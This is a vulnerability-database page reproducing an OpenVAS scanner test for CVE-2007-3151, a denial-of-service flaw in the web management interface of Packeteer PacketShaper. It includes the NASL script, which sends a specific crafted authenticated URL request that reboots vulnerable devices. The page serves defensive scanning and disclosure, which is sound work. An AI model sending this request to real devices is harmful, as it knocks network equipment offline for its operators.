Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasThis script is Copyright (c) 2006-2007 nnposterOPENVAS:80030
HistoryOct 24, 2008 - 12:00 a.m.

Packeteer PacketShaper Web Denial of Service

2008-10-2400:00:00
This script is Copyright (c) 2006-2007 nnposter
plugins.openvas.org
9

EPSS

0.122

Percentile

95.4%

JSON

The remote host is affected by a denial of service vulnerability.

Description :

Packeteer PacketShaper is susceptible to a denial of service
vulnerability in the web management interface. Requesting a specific
URL will cause the device to reboot. The user must first log in but
even read-only access is sufficient.

# OpenVAS Vulnerability Test
# $Id: packeteer_packetshaper_web_dos.nasl 7293 2017-09-27 08:49:48Z cfischer $
# Description: Packeteer PacketShaper Web Denial of Service
#
# Authors:
# nnposter
#
# Copyright:
# Copyright (C) 2006-2007 nnposter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_solution = "Restrict network access to the device management interfaces.

CVSS Base Score : 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)";

tag_summary = "The remote host is affected by a denial of service vulnerability. 

Description :

Packeteer PacketShaper is susceptible to a denial of service
vulnerability in the web management interface.  Requesting a specific
URL will cause the device to reboot.  The user must first log in but
even read-only access is sufficient.";


if (description)
    {
    script_id(80030);
    script_version("$Revision: 7293 $");
    script_tag(name:"last_modification", value:"$Date: 2017-09-27 10:49:48 +0200 (Wed, 27 Sep 2017) $");
    script_tag(name:"creation_date", value:"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)");
    script_tag(name:"cvss_base", value:"5.0");
    script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");

    script_cve_id("CVE-2007-3151");
    script_bugtraq_id(24388);
    script_xref(name:"OSVDB", value:"37230");

    name="Packeteer PacketShaper Web Denial of Service";
    script_name(name);

    summary="Tests for Packeteer PacketShaper web management interface DoS";

    family="Web application abuses";
    script_family(family);

    script_category(ACT_MIXED_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");

    script_copyright("This script is Copyright (c) 2006-2007 nnposter");
    script_dependencies("packeteer_web_version.nasl");
    script_require_ports("Services/www",80);
    script_mandatory_keys("bluecoat_packetshaper/installed");
    script_tag(name : "summary" , value : tag_summary);
    script_tag(name : "solution" , value : tag_solution);
    script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/470835/30/0/threaded");
    exit(0);
    }

# Notes:
# - Does not work with http_keepalive_send_recv() for some reason.
#   Resorting to http_send_recv()


include("http_func.inc");
include("misc_func.inc");
#include("snmp_func.inc"); # get_version_snmp() is commented out below...

if (!get_kb_item("bluecoat_packetshaper/installed")) exit(0);


function set_cookie (data,cookie)
{
local_var EOL,req;
EOL='\r\n';
req=ereg_replace(string:data,pattern:EOL+'Cookie:[^\r\n]+',replace:"");
req=ereg_replace(string:req,pattern:EOL+EOL,replace:EOL+cookie+EOL);
return req;
}


function get_version_snmp ()
{
local_var sys,match,ver;
sys=get_snmp_sysdesc(port:161);
if (!sys) return;
match=eregmatch(pattern:"^Packeteer PacketShaper ([A-Za-z0-9.]+)",string:sys);
ver=match[1];
if (!ver) return;
return ver;
}


port=get_http_port(default:80);
product=get_kb_item("www/"+port+"/packeteer");
if (!get_tcp_port_state(port) || product!="PacketShaper") exit(0);


if (safe_checks())
    {
    KNOWN_BROKEN_VERSION="7.5.1g1";
    version=get_kb_item("www/"+port+"/packeteer/version");
#if (!version) version=get_version_snmp();
    if (version && version =~ "^([0-6]\.|7\.([0-4]\.|5\.(0|1([a-f]|g0))))")
        {
        report = string(
          "The vulnerability has not been tested. The assessment is based\n",
          "solely on the device software version, which is ",version,"."
        );
        security_message(port:port,data:report);
        }
    exit(0);
    }

cookie=get_kb_item("/tmp/http/auth/"+port);
if (!cookie) exit(0);

if (http_is_dead(port:port)) exit(0);
req=http_get(item:"/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=",port:port);
resp=http_send_recv(port:port,data:set_cookie(data:req,cookie:cookie));
if (!http_is_dead(port:port)) exit(0);

security_message(port);

Related

prion 1
cvelist 1
nvd 1
nessus 1
exploitdb 1
cve 1
openvas 1
prion
prion
Design/Logic Flaw
2007-06-11 22:30:00
cvelist
cvelist
CVE-2007-3151
2007-06-11 22:00:00
nvd
nvd
CVE-2007-3151
2007-06-11 22:30:00
nessus
nessus
Packeteer PacketShaper Web Management rpttop.htm Crafted Request Remote DoS
2007-06-26 00:00:00
exploitdb
exploitdb
Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service
2007-06-08 00:00:00
cve
cve
CVE-2007-3151
2007-06-11 22:30:00
openvas
openvas
Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151)
2008-10-24 00:00:00

EPSS

0.122

Percentile

95.4%

JSON
Related for OPENVAS:80030
prion1cvelist1nvd1nessus1exploitdb1cve1openvas1